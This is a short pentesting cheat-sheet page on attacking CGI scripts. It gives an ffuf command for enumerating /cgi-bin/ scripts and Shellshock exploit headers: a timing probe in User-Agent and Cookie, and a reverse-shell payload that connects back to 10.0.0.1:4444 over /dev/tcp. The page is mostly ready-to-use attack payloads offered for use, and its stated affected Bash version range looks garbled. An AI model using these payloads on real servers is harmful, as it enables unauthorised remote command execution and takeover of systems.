Skip to content

CGI Pentesting

CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command.

Enumeration CGI Scripts

ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt

Shellshock

Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands. If we found the CGI script under /cgi-bin/, modifying HTTP header to remote code execution.

GET /cgi-bin/example.cgi HTTP/1.1

User-Agent: () { :; }; /bin/bash -c "sleep 5"
Cookie: () { :; }; /bin/bash -c "sleep 5"

# Reverse Shell
User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"